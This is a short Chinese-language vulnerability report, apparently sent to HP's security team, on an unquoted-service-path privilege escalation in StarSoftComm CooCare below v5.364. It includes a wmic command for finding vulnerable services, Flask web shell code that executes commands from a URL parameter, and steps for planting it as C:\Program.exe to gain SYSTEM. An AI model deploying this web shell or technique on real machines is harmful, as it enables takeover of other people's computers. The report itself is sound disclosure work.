####################################################
我已联系 hp-security-alert,他们已修复此漏洞。关于 StarSoftComm CooCare [HP-PSRT-IR #4106]

供应商回复了以下信息:
请按照以下步骤更新:
#####################################
StarSoftComm HP CooCare 存在一个权限提升漏洞,攻击者可利用该漏洞提升其权限级别。
e管家超级版是 HP 星 14 pro 自带的一款远程诊断软件,该软件为 StarSoftComm(软通科技)旗下产品。
测试环境:Windows 11 22621.819 HP LAPTOP HP Pavilion Plus 14 英寸笔记本电脑 14-eh0000 (56D77AV)
受影响版本:CooCare 低于 v5.364
#漏洞复现
#第一步:wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\" |findstr /i /v """
查找服务(使用上述 CMD 命令找到未引用的服务)

服务名称为 Windows Application Management Service,简称 WinAppMgmt。

该服务来自 StarSoftComm CooCare。

#第二步:准备恶意程序

from flask import Flask, request
import os
app = Flask(__name__)
@app.route('/')
def hello_world():
r = request.args.getlist('cmd') # 接收 ?cmd= 参数
a=os.popen(r[0]) # 执行系统命令
l = a.read()
return l # 返回
if __name__ == '__main__':
app.run(host='0.0.0.0', port=14145, debug=True) # 监听 HTTP 端口 14145
我使用 Python3 Flask 编写了一个恶意 exe,它可以监听 HTTP 端口 14145 并执行系统命令。
使用命令 pyinstaller.exe --onefile --windowed -F -w python_test.py 生成恶意 exe。
#第三步:将恶意软件放入路径 C:\ 并重命名为 Program.exe

#第四步:启动 Windows Application Management Service
如果 Windows Application Management Service 已启动,可以重启它。

#第五步:等待 Windows Application Management Service 启动并执行系统命令
C:\Program.exe 以系统权限运行
当我在任务管理器中看到 Windows Application Management Service 以 SYSTEM 身份启动时,打开浏览器输入 http://127.0.0.1:14145?cmd=whoami
等待......
......
它返回了。
NT SYSTEM
